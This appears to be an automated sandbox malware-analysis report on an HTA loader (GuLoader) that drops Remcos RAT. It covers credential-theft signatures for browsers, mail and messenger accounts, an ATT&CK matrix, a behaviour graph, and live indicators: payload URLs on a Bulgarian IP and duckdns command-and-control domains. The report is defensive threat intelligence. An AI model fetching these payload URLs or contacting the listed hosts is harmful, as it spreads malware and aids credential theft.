              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: wab.exe, 0000000A.00000002.3229604457.0000000007377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*sG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/OG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles}G
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.drBinary or memory string: [2024/05/02 01:15:11 Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd996cahG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd996caaG
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.drBinary or memory string: [2024/05/02 01:15:01 Program Manager]
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92933 cpuid 10_2_22C92933
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_22C92264
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword19_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword19_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword19_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4476, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8024, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API              		11
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter              		Logon Script (Windows)212
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares11
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login Hook11
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Credentials In Files              		310
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets51
              Security Software Discovery              		SSH2
              Clipboard Data              		24
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials51
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
              Virtualization/Sandbox Evasion              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435041 Sample: PLOCMR-002 Dane dotycz#U010... Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 60 jgbours284hawara02.duckdns.org 2->60 62 jgbours284hawara01.duckdns.org 2->62 64 geoplugin.net 2->64 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 88 8 other signatures 2->88 11 mshta.exe 1 2->11         started        14 chrome.exe 9 2->14         started        17 svchost.exe 1 2 2->17         started        signatures3 86 Uses dynamic DNS services 62->86 process4 dnsIp5 104 Suspicious powershell command line found 11->104 106 Very long command line found 11->106 19 powershell.exe 15 19 11->19         started        70 192.168.2.5, 3050, 3051, 443 unknown unknown 14->70 72 239.255.255.250 unknown Reserved 14->72 23 chrome.exe 14->23         started        74 127.0.0.1 unknown unknown 17->74 signatures6 process7 dnsIp8 66 87.121.105.163, 49707, 49728, 80 NET1-ASBG Bulgaria 19->66 90 Suspicious powershell command line found 19->90 92 Very long command line found 19->92 94 Found suspicious powershell code related to unpacking or dynamic code loading 19->94 25 powershell.exe 19->25         started        28 conhost.exe 19->28         started        30 cmd.exe 1 19->30         started        68 www.google.com 142.250.80.100, 443, 49712, 49713 GOOGLEUS United States 23->68 signatures9 process10 signatures11 102 Writes to foreign memory regions 25->102 32 wab.exe 5 15 25->32         started        37 cmd.exe 25->37         started        process12 dnsIp13 54 jgbours284hawara01.duckdns.org 192.169.69.26, 3050, 3051, 49729 WOWUS United States 32->54 56 jgbours284hawara02.duckdns.org 45.88.90.110, 3050, 49731, 49732 LVLT-10753US Bulgaria 32->56 58 geoplugin.net 178.237.33.50, 49733, 80 ATOM86-ASATOM86NL Netherlands 32->58 52 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 32->52 dropped 76 Maps a DLL or memory area into another process 32->76 78 Installs a global keyboard hook 32->78 39 wab.exe 1 32->39         started        42 wab.exe 1 32->42         started        44 wab.exe 16 32->44         started        46 5 other processes 32->46 file14 signatures15 process16 signatures17 96 Tries to steal Instant Messenger accounts or passwords 39->96 98 Tries to steal Mail credentials (via file / registry access) 39->98 100 Tries to harvest and steal browser information (history, passwords, etc) 42->100 48 conhost.exe 46->48         started        50 reg.exe 1 1 46->50         started        process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta54%ReversingLabsScript-WScript.Trojan.Guloader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://www.ebuddy.com0%URL Reputationsafe
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp00%Avira URL Cloudsafe
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u0%Avira URL Cloudsafe
              http://87.121.105.163/Subumbilical.dwpXR0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
              http://geoplugin.net/i0%Avira URL Cloudsafe
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE0%Avira URL Cloudsafe
              jgbours284hawara01.duckdns.org100%Avira URL Cloudmalware
              http://www.imvu.comata0%Avira URL Cloudsafe
              http://87.121.105.163/Subumbilical.dwp0%Avira URL Cloudsafe
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpg0%Avira URL Cloudsafe
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin0%Avira URL Cloudsafe
              http://87.121.105.1630%Avira URL Cloudsafe
              http://geoplugin.net/json.gp_0%Avira URL Cloudsafe
              http://crl.ver)0%Avira URL Cloudsafe
              http://87.121.1080%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gprqDS0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              jgbours284hawara01.duckdns.org
              		192.169.69.26
              		truetrue
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  www.google.com
                  		142.250.80.100
                  		truefalse
                    		high
                    jgbours284hawara02.duckdns.org
                    		45.88.90.110
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      jgbours284hawara01.duckdns.orgtrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                        		high
                        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                          		high
                          https://www.google.com/async/newtab_promosfalse
                            		high
                            http://geoplugin.net/json.gptrue
                            • URL Reputation: phishing
                            		unknown
                            https://www.google.com/async/ddljson?async=ntp:2false
                              		high
                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                		high
                                http://87.121.105.163/Subumbilical.dwpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabwab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                  		high
                                  http://www.imvu.comrwab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                    		high
                                    http://87.121.105.163/Subumbilical.dwpXRpowershell.exe, 00000001.00000002.2770000985.0000000004ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.00000000048CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://geoplugin.net/iwab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binEwab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://geoplugin.net/json.gp0wab.exe, 0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.biwab.exe, 0000000A.00000002.3241007927.00000000227C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.2584352581.00000000057D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000003.00000003.2000735992.0000021BB3CE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wab.exe, 00000010.00000002.2660982925.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, chp62E3.tmp.16.drfalse
                                        		high
                                        http://www.nirsoft.netwab.exe, 00000010.00000002.2643556229.0000000000682000.00000004.00000010.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000A.00000002.3241465613.0000000022C60000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.comwab.exe, wab.exe, 00000016.00000002.2629763213.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2770000985.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2577173319.0000000004771000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://geoplugin.net/json.gpIwab.exe, 0000000A.00000003.2595279106.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2618840472.0000000007363000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2666078506.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668402409.0000000007373000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2668934165.0000000007373000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
